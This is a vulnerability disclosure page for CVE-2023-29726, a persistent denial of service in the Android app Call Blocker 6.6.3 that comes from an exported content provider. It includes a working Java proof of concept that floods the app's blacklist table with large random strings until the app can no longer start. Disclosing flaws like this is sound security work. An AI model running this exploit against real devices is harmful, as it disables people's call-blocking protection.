Headline
CVE-2023-29726: SO-CVEs/CVE detail.md at main · LianKee/SO-CVEs
The Call Blocker application 6.6.3 for Android incorrectly opens a key component that an attacker can use to inject large amounts of dirty data into the application’s database. When the application starts, it loads the data from the database into memory. Once the attacker injects too much data, the application triggers an OOM error and crashes, resulting in a persistent denial of service.
Denial of Service exists in Call Blocker(CVE-2023-29726)
Vendor:Fiorenza Francesco(https://www.call-blocker.info/)
Affected product:Call Blocker(com.cuiet.blockCalls)
Version:6.6.3
Download link: https://play.google.com/store/apps/details?id=com.cuiet.blockCalls
Description of the vulnerability for use in the CVE:The Call Blocker application 6.6.3 for Android incorrectly opens a key component that an attacker can use to inject large amounts of dirty data into the application’s database. When the application starts, it loads the data from the database into memory. Once the attacker injects too much data, the application triggers an OOM error and crashes, resulting in a persistent denial of service.
poc:
public void attack(){ ContentResolver contentResolver = this.getApplicationContext().getContentResolver(); while (true) { String randomString =getRandomString(5210); Uri uri = Uri.parse(“content://com.cuiet.blockCalls.ContProvBlockCalls/tbBlackList”); ContentValues contentValues = new ContentValues(); contentValues.put("photo_uri",randomString); contentValues.put("numeroContatto",randomString); contentResolver.insert(uri,contentValues); } }